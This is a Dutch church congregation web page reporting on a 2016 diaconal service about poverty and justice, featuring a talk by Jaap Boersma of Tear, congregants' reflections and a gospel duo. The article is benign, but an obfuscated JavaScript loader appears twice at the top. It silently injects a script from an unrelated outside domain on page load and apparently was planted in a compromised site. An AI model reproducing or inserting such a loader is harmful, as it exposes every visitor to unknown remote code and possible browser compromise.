;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Speciale diaconale dienst … ‘Waarom ben ik zo arm ?” - PKN Damwâld

Speciale diaconale dienst … ‘Waarom ben ik zo arm ?”

Gepubliceerd op: maandag 14 november 2016

Zondagmiddag 13 november was De Ikker in Damwâld het podium voor een speciale diaconale dienst. Zoals ds. G.Timmer bij de introductie ook aangaf is de kerntaak van het diaconaat in onze gemeente en eigenlijk voor alle Christenen: “helpen waar geen helper is, hier en in de wereld”. Maar hoe geef je daar concreet gestalte aan?

Jaap Boersma (Tear) nam ons deze zondagmiddag mee in de wereld van Fatima, een vrouw die hij mocht ontmoeten in Bangladesh en die hem enorm intrigeerde met de vraag ‘Waarom ben ik arm’. Aan de hand van Psalm 72 hield Jaap een zeer boeiend betoog over ‘recht doen’. Als het gaat over arm en rijk maken jouw keuzes een verschil. Voor anderen én voor jezelf. Strijden tegen armoede en voor gerechtigheid kun je op veel manieren doen. Door na te denken over je levensstijl en de gevolgen daarvan voor de armen. Door mee te doen met campagnes en acties. En ook door te geven en te bidden. Soms lijkt dat best moeilijk: want is hulp geen druppel op de gloeiende plaat? Wat voegt het toe? Jaap gaf niet alleen concrete voorbeelden van hulpverlening, maar daagde ons ook uit om na te denken over wat wij kunnen betekenen.
Jaap heeft jarenlang met zijn gezin in Sri Lanka gewoond en is al vele jaren bij Tear betrokken geweest bij de grote noodhulpacties zoals de tsunami, de aardbevingen in Pakistan en in Haïti en recentelijk de tyfoon op de Filippijnen en de hulp aan vluchtelingen in Irak. Momenteel is hij onder meer organisatieontwikkelaar bij Tear, een organisatie die wereldwijd kerken helpt om te strijden tegen armoede en onrecht en doet op dit moment zijn Masters in Mission in Development aan het All Nations College in Engeland.

Niet alleen konden er gebedspunten worden ingediend, maar ook konden de aanwezigen in het kader van deze diaconale dienst hun gedachten noteren over de vraag ‘Wat neem je mee naar huis ?’. Een kleine bloemlezing:  ‘De bemoediging van het geloof en geloofsgroei’, ‘aan anderen denken en helpen, beseffen dat we zelf ontzettend rijk zijn’, ‘aan de slag!’, ‘de wearmte fan Gods Leafde’, ‘armoede is overal’, ‘dat we niet alleen aan onszelf moeten denken, ook aan mensen die het veel minder hebben en veel meer verdienen’, ‘wat wil jij betekenen in deze wereld?’ en ‘opnieuw de boodschap dat we er niet voor onszelf zijn, maar voor de mensen om ons heen’.

In een goedgevulde kerk konden de aanwezigen verder genieten van een uitstekend optreden van het gospelduo Promise, die niet alleen een ‘eigen’ optreden verzorgden, maar bovendien ook de samenzang begeleiden. Heerlijke muziek en prachtige zangstemmen!